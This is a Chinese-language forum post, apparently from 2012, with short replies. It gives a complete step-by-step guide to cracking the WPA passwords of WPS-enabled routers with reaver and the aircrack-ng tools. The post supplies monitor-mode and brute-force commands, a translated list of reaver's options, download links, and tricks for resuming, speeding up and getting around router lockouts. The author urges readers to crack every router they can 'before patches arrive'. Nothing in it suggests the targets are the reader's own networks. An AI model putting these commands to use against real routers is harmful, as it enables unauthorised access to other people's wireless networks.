使用步骤
pin码破密特点:1、不需要客户端,2、有PIN码就能获得无线密码,3、八位数PIN码实际只有一万一千组随机密码,4、抓包、EWSA跑包,每个环节都有很大的不确定性。而PIN破密,只要开户WPS,破密只是个时间问题。提醒:大家还是早点都把能pin的路由都破了!可能马上就有安全补救方案出来了!到时候就没机会了,时不我待、只争朝夕!BT5、CDlinux、beini、xiaopan-OS都支持reaver运行。reaver使用方法、步骤:打开超级终端 ROOt shell 如果电脑装有多个无线网卡,请先发指令ifconfig -a确认你用哪一个网卡WLAN0或WLAN1下面的指令都是以单一网卡WLAN0为例一、激活监听模式:airmon-ng start wlan0二、查看周边AP信息(抓包):airodump-ng mon0观察要破AP的PWR信号强弱变化,注意同频干扰,调整网卡放置位置和角度、方向。PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)三、按Ctrl+C终止抓包四、 抓PIN码:reaver -i mon0 -b MAC -vv例如:reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv1.4版可用:reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v (可用一个v)注意,MAC中冒号不可省略,MAC地址的字母大小写均可, -vv是两个V不是W!下载reaver:先下载cdlinux专用reaver的图形化 http://anywlan.com/bbs/images/attachicons/zip.gif cdlinux专用reaver的图形化.zip (1.11 MB)再下载图形化的 http://anywlan.com/bbs/images/attachicons/rar.gifminidwep-gtk-30208-cdl(1.7 MB 支持多网卡多AP同时PIN)将下载文件解压添加到CDlinux-0.9.6.1(或CDlinux-0.9.7)local目录内。将显示如下图http://www.anywlan.com/bbs/attachment.php?aid=MTk5NTE1fGU4MDg4NDY3fDEzMjc3NTQ1MTd8NTFhZUljRzBxaVhkMWxlZlBwcTFEQ0hXWUhnai9MUmFZM3JRYzd6S0lzckpxOEU=&noupdate=yes其次是下载小胖,程序小启动快!xiaopanOS-.isohttp://www.anywlan.com/bbs/thread-116228-1-1.html用UltraISO (vista、win7 以管理员身份打开)打开xiaopanOS.iso启动 - 写入硬盘映像,选择u盘、格式化 - 写入 。UltraISO 9.5http://xiazai.zol.com.cn/detail/6/50186.shtml注册码网上能找到的http://anywlan.com/bbs/thread-112141-1-1.html此外,下载CDlinux、beini专用reaver1.3,reaver-1.3-a-cdl.tgz.zip解压出reaver1.3.tcz拷贝到CDlinux/local文件夹下即可,驱动程序多、运行很稳定。reaver1.3感觉比1.4更稳定些。reaver1.4-svn-r112 for CDlinux-0.9.6.1http://www.anywlan.com/bbs/thread-116572-1-1.html特别提示:只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!如何查看AP是否开了WPS、QSS呢?一、使用指令:airodump-ng mon0MB一栏下,出现 54e. (看清楚有点“.”) 是开WPS的二、WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器按钮也可以连接”,就确认此AP开了WPS、QSS。但是,WIN7下不出现“通过按路由器按钮也可以连接”,不等于100%没开WPS。还是 54e. 准。AP关闭了WPS、或者没有QSS滴,会出现WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout)。特别是1、6默认频道中,有较多的AP,相互干扰因此,确定网卡放置的最佳位置、方向、角度十分重要。快速、简易确定对方无线路由器AP方位的技巧---探寻最佳信号接收位置http://anywlan.com/bbs/thread-94597-1-1.html破戒过程中 ,重复同一个PIN码 或 timeou t 可随时随地按Ctrl+C终止,reaver会自动保存进度。重复第2-4项内容,先看看AP信号强弱或是否关机,若继续破,则再次在终端中发送:reaver -i mon0 -b MAC -vv这条指令下达后,会让你选y或n,选y后就继续了当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。曙光就在前头,胜利往往在 再坚持一下的努力之中。如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)会从指定PIN段起破密。如何保存破密进程呢:reave的进度表文件保存在1.3版:/etc/reaver/MAC地址.wpc1.4版:/usr/local/etc/reaver/MAC地址.wpc用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中,下次重启动后,再手工复制到/etc/reaver/ 目录下即可。CDLINUX下可以粘贴在CDLINUX的桌面上但就是不能粘贴在 usr/local/etc/reaver里面,解决方法:新开个窗口 输入 sudo thunar这样打开的文件管理器,具有root权限,可以拷贝文件到任何目录了!更多内容,回复可见........**** Hidden Message *****
lgt200 发表于 2012-1-14 13:46:28
:handshake
pesticide63 发表于 2012-1-14 13:47:57
本帖最后由 pesticide63 于 2012-1-16 23:59 编辑如何查看AP是否开了WPS、QSS呢?WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器按钮也可以连接”,就确认此AP开了WPS、QSS。http://anywlan.com/bbs/attachment.php?aid=MTk3NzY3fDUwOGZmN2M0fDEzMjY1Mjg4OTV8Y2NjNm5YRWs3QW5TVVFWYy91QXVtd2srbm9PckFlTzRIeWlqRlJpYTQvekdUbVk=&noupdate=yes当reaver确定前4位PIN密码后,其工作完成进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。曙光就在前头,胜利往往在 再坚持一下的努力之中。运气+人品极重要请看下面这图:总共跑了十几分钟就出结果了。跑到1%不到,就确认了前4位,进度直接踊跃到90.9%,随后三分钟后又得获大惊喜。http://www.anywlan.com/bbs/attachment.php?aid=MTk3NzEwfGMzYmQzN2M0fDEzMjY3MjE3MTV8MThmM3dwaEM2cktxbHlRMXI5M0kzZVRURFZjMjRhS1piUURjamNTQWNaMmdDQ1k=&noupdate=yeshttp://www.anywlan.com/bbs/thread-115597-1-1.html-p参数:-p PIN可以让你在获取到PIN的情况下,直接得到路由WPA密码!reaver -i mon0 -b MAC -p PIN这个命令是指定PIN码,获得WPA 密码PSKhttp://www.anywlan.com/bbs/thread-115329-1-1.html
Reaver基本命令参数
XiaoPanOS下:
选择“终端”输入sudo thunar
这里是为了取得超级权限,选择系统文件-usr-local-ect-reave
ifconfig –a //确认你用哪一个网卡WLAN0或WLAN1
airmon-ng start wlan0 //开启监听模式
wash –i mon0 –C //查看开启wps的无线路由器
airodump-ng mon0 //查看周边AP信息(抓包)
reaver –i mon0 –b MAC –a –S –vv –d 3 –t 3 //开始穷举PIN码
reaver –i mon0 –b MAC –a –S –vv –d 0 //加快速度为1秒
reaver –i mon0 –b MAC –a –S –vv –p xxxx //从前4位PIN码开始
reave的进度表文件保存在:
1.3版:/etc/reaver/MAC地址.wpc
1.4版:/usr/local/etc/reaver/MAC地址.wpc
CDliunx下:
选择“终端”输入sudo thunar
这里是为了取得超级权限,选择系统文件-usr-local-ect-reaver-
reaver必需的参数:
-i, --interface=wlan Name of the monitor-mode interface to use //监视模式接口使用的名称
-b, --bssid=mac BSSID of the target AP //目标AP的SSID
reaver可选参数:
-m, --mac=mac MAC of the host system //主机系统的MAC
-e, --essid=ssid ESSID of the target AP //目标AP的ESSID
-c, --channel=channel Set the 802.11 channel for the interface (implies -f)
//设置接口的802.11信道 (意味着 -f)
-o, --out-file=file Send output to a log file [stdout] //输出发送到一个日志文件
-s, --session=file Restore a previous session file //恢复以前的记录文件
-C, --exec=command Execute the supplied command upon successful pin recovery
//所提供的命令执行成功后,pin 恢复
-D, --daemonize Daemonize reaver //守护进程 reaver
-a, --auto Auto detect the best advanced options for the target AP
//自动检测目标AP的最先进的选项
-f, --fixed Disable channel hopping //禁用信道跳频
-5, --5ghz Use 5GHz 802.11 channels //使用5GHz的802.11信道
-v, --verbose Display non-critical warnings (-vv for more) //显示非关键的警告(- VV更多)
-q, --quiet Only display critical messages //仅显示重要消息
-h, --help Show help //显示帮助
reaver高级选项:
-p, --pin=wps pin Use the specified 4 or 8 digit WPS pin //使用指定的4个或8个的 pin WPS
-d, --delay=seconds Set the delay between pin attempts [1] //设置pin尝试之间的延迟[1]
-l, --lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts [60]
//设置等待的时间,如果AP锁定WPS PIN尝试[60]
-g, --max-attempts=num Quit after num pin attempts //退出后NUM pin尝试
-x, --fail-wait=seconds Set the time to sleep after 10 unexpected failures [0]
//设定时间后进入休眠10[0]意外故障
-r, --recurring-delay=xy Sleep for y seconds every x pin attempts //对每一个pin码尝试Y秒
-t, --timeout=seconds Set the receive timeout period [5] //设置接收超时时间[5]
-T, --m57-timeout=seconds Set the M5M7 timeout period [0.20] //设置M5M7超时期[0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
//不要与AP关联(协会必须由另一个应用程序进行)
-N, --no-nacks Do not send NACK messages when out of order packets are received
//不要发送NACK消息收到时,为了包出
-S, --dh-small Use small DH keys to improve crack speed //使用小DH密钥,以提高PJ速度
-L, --ignore-locks Ignore locked state reported by the target AP //忽略锁定状态的目标AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
//终止每一个EAP失败包WPS的记录
-n, --nack Target AP always sends a NACK [Auto] //目标AP发送一个NACK[自动]
-w, --win7 Mimic a Windows 7 registrar [False] //模仿Windows 7的注册处处长[虚假]
reaver 使用方法和技巧:
reaver使用方法:
reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -c 频道
-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高PJ速度
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间预设为1秒
-c 频道
-p PIN码四位或八位 //可以用8位直接找到密码。
当出现有百分数时你就可以用crtl+c来暂停,它会将reaver的进度表文件保存在
1.3版:/etc/reaver/MAC地址.wpc
1.4版:/usr/local/etc/reaver/MAC地址.wpc (tmp/minidwep/MAC地址.wpc)
用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中,
下次重启动后,再手工复制到/etc/reaver/ 目录下即可。
注意需要取得ROOT权限,才可将wpc文件复制到/etc/reaver/ 目录下:
在终端模拟里面输入:
SUDO SU
SUDO THUNAR
reaver使用技巧:
1、将mac地址.wpc 备份后,下次可以继续使用。
2、程序默认每尝试后停止一秒,加入-d0参数使之不停止:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -d0
3、-p参数:-p PIN可以让你在获取到PIN的情况下直接得到路由WPA密码!
reaver-i mon0 -b MAC -p PIN
4、wpc结构
0 //这个地方是说它的前4位PIN码的进度位置数,真实位置要+4
0 //这个地方是说后3位PIN数的已经运行测试位置数
0 //0时没有找到,当为1时找到前四位,当为2时全部找到。
下面是1万个前四位数(reaver1.3版4位随机数,1.4版是升序)
第4行起
0000
0001
.
.
9999
下面是1千个三位数(PIN第八位数是验证码)
从1004行起
000
.
.
999 所以前四位很重要,将已经知道的前四位放在最前面会提高你的PIN速度,我们也可以手动修改wpc文件第一行,如我们要从3000开始pin你可以将它修改为3004,这样它就会从3000开始PIN了。当我们在PIN时就可以不用保存虚拟机快照了,只要你记住了前四位,你下载用软件修改WPC文件就可了。
cdlinux对wpc文件最方便,
beini和xiaopan对wpc修改要用命令vi来修改,
vi的使用方法很简单viXXXX.wpc打开就可以了,
输入i进行编辑,输入escap退回命令模式,输入:wq退出保存。
Pin码重复出现死循环解决之道:
1.xiaopanOS环境解决之道:
当你看到PIN到一定程度,窗口里的PIN码不变、进度百分比也不走,那么,保持原窗口不变,再点击ROOTSHELL图标,新开一个PIN窗口,输入 “reaver -i mon0 -b (正在PIN的目标MAC) -a -s -vv ”(注意:这里“S”要小写) 那么,你就会发现原来PIN的窗口,PIN码开始改变,进度开始前进了!而且PIN的时间也大为缩短了!如果是破解到99.99%,执行此部操作就马上弹出正确的pin码和wifi密码,以及路由器的SSID。
2.CDlinux环境解决之道:
当你看到PIN到一定程度,窗口里的PIN码不变、进度百分比也不走,那么,请Ctrl+C停止,然后点击[Reaver]按钮,在弹出的窗口中输入“-a -s –vv“ (注意:这里“S”要小写) 那么,你就会发现原来PIN的窗口,PIN码开始改变,进度开始前进了!而且PIN的时间也大为缩短了!,如果是破解到99.99%,执行此部操作就马上弹出正确的pin码和wifi密码,以及路由器的SSID。
若到90.9%或99.9%还是不出,也可以试试“reaver -i mon0 -b (正在PIN的目标MAC) -v -a -n [-c]”
时间及经验总结,基本90.9%和99.9%的死循环,已经100%成功了,最后祝大家破解愉快!
用Reaver pin码破特点:
1、不需要客户端,
2、有PIN码就能获得无线密码,
3、八位数PIN码实际只有一万一千组随机密码,
4、抓包、EWSA跑包,每个环节都有很大的不确定性。而PIN破密,只要开户WPS,破密只是个时间问题。
提醒:大家还是早点都把能pin的路由都破了!可能马上就有安全补救方案出来了!到时候就没机会了,时不我待、只争朝夕!
BT5、CDlinux、beini、xiaopan-OS都支持reaver运行。reaver使用方法、步骤:
打开超级终端 root shell
如果电脑装有多个无线网卡,请先发指令ifconfig -a确认你用哪一个网卡WLAN0或WLAN1
下面的指令都是以单一网卡WLAN0为例
一、激活监听模式: airmon-ng start wlan0
二、查看周边AP信息(抓包):airodump-ng mon0
观察要破AP的PWR信号强弱变化,注意同频干扰,调整网卡放置位置和角度、方向。
PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)
三、按Ctrl+C终止抓包
四、抓PIN码: reaver -i mon0 -b MAC -vv
例如:reaver -i mon0 -b C8:3A:35:F6:BB:B8 –vv
1.4版可用:reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v(可用一个v)
注意,MAC中冒号不可省略,MAC地址的字母大小写均可, -vv是两个V不是W!
reaver1.3感觉比1.4更稳定些。
特别提示:只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!
如何查看AP是否开了WPS、QSS呢?
一、使用指令: airodump -ng mon0
MB一栏下,出现54e.(看清楚有点“.”)是开WPS的
二、WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器按钮也可以连接”,就确认此AP开了WPS、QSS。但是,WIN7下不出现“通过按路由器按钮也可以连接”,不等于100%没开WPS。还是 54e.准。
AP关闭了WPS、或者没有QSS滴,会出现“WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)”
PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或timeout)。 特别是1、6默认频道中,有较多的AP,相互干扰。因此,确定网卡放置的最佳位置、方向、角度十分重要。
破解过程中重复同一个PIN码或timeout可随时随地按Ctrl+C终止,reaver会自动保存进度。
若继续破,则再次在终端中发送: reaver -i mon0 -b MAC -vv,这个命令运行后,会让你选y或n,选y后就继续了。
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
会从指定PIN段起破密。
如何保存破密进程呢:
reave的进度表文件保存在
1.3版:/etc/reaver/MAC地址.wpc
1.4版:/usr/local/etc/reaver/MAC地址.wpc
用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中,下次重启动后,再手工复制到/etc/reaver/ 目录下即可。CDLINUX下可以粘贴在CDLINUX的桌面上但就是不能粘贴在 usr/local/etc/reaver里面,解决方法:
新开个窗口输入 sudo thunar,这样打开的文件管理器,具有root权限,可以拷贝文件到任何目录了!
timeout时,可适当调整网卡方位,在同一PIN数值反复测试。也可Ctrl+C终止破密,让路由器休息几十秒,也是不错的选择,否则个别型号AP会自锁PIN连接功能。
另外,也可以给命令增加2个参数,延长PIN穷举和反馈的响应时间避免路由当机。
reaver -i mon0 -b MAC -a -S -vv -d 3 -t 3
-d 即delay每穷举一次的闲置时间预设为1秒
-t 即timeout每次穷举等待反馈的最长时间